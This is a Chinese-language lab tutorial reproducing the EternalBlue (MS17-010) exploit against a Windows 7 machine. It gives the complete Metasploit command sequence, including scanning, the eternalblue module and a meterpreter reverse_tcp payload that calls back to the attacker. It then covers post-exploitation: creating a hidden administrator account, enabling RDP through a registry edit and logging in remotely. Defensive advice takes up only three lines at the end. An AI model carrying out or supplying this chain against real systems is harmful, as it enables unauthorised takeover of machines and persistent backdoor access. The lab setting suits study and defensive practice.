一,什么是永恒之蓝
永恒之蓝的具体介绍我将不再解释,下面这个百度链接它会告诉你,现在我们开始正题——永恒之蓝漏洞复现及其操作介绍
二、漏洞复现
复现环境:
攻击机:Linux kali[i3桌面环境](IP:172.16.167.153) 靶机:Windows 7 旗舰版(x64)(IP:172.16.167.154) 实验条件:两台机子可以相互ping通,并且靶机(无ms17-010漏洞的相关补丁)开启了445端口,防火墙是关闭的!
注意:这里的i3桌面环境对实验无任何影响,在本次实验中如有任何让你感到与你的实验中不同的界面不要怀疑它,你的也许也是对的
确认同网段,确认漏洞存在
确认自己攻击机ip及靶机ip
kali终端命令
ip a
windos终端命令
ipconfig
以上命令查到的ip要确保两台机器在同一个网段,默认情况下,例如192.16.168.1和192.16.168.2这样的被.分隔开的前三个的是一样的在同一网段。
攻击前记得nmap扫描敌坐标端口情况
nmap -T4 -A -v -Pn 目标敌ip
启动msfconsole,开始攻击流程
msfconsole
如下界面继续以下操作:
搜索ms17-010的代码
search ms17_010
在出现的数个模块中 auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。通常配合使用,通常先扫描,若显示有漏洞,再进行攻击。
接下来use需要的模块,比如我们要使用3模块进行扫描就输入以下命令##这里我的3模块是扫描模块##
use 3
锁定目标坐标:
set rhost 172.16.167.154
设置本机坐标:
set lhost 172.16.167.153
执行run运行模块进行雷达扫描一下我们的目标是否有防御漏洞
run
出现以下的情况表示ms17-010漏洞存在
退出扫描模块开始我们的攻击
(这里我的攻击模块是0号模块)
search ms17_010
use 0
设置载荷单元
set payload windows/x64/meterpreter/reverse_tcp
锁定目标
set rhost 172.16.167.154
设置本机坐标:
set lhost 172.16.167.153
检查攻击诸元是否就绪
show options
如上图,目标坐标rhost好,攻击单元lhost好,攻击端口lport好,载荷Payload options好,敌端口rhost好,开始攻击
run
让EMP导弹飞一会
出现上图就攻击成功了
攻击成功开始篡改终端
首先看看我们的敌人在干嘛,截个图来看看 (注意该命令不加任何参数截图将会保存到以下路径:~/
screenshot
原来再看红色警戒3:日冕mod的宣传片啊,游戏虽好玩但不要贪杯哦
接下来让我们来做一些司械该做的事,那就是终端篡改和外墙刷漆
首先打开得打开控制终端
shell
出现乱码哩好难看,修改编码
chcp 65001
创个用户先
net user 用户名 密码 /add
查看一下先(这里只要看到我们刚刚创建的用户就算创建成功了)
net user
把我们刚刚创建的用户加入管理员组
net localgroup administrators 用户名 /add
接下来进行远程桌面登录
查看必要的敌3389端口状态:
netstat -ano
芜湖,看来他没有关闭3389端口捏,兄弟们搞他
如果3389端口没开启可以用下面的命令开启
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在kali切换一个新的终端打开输入
rdesktop 目标ip:3389
这个界面输入刚刚创建的用户登录
再等550W为我们建立量子链接
登录成功了
其他的一些需要管理员权限才能进行的操作我就不展示了
至此神州司械宣布终端篡改成功外墙刷漆成功
MS17-010漏洞防范
- 打开防火墙
- 安装安全软件
- 安装相应的补丁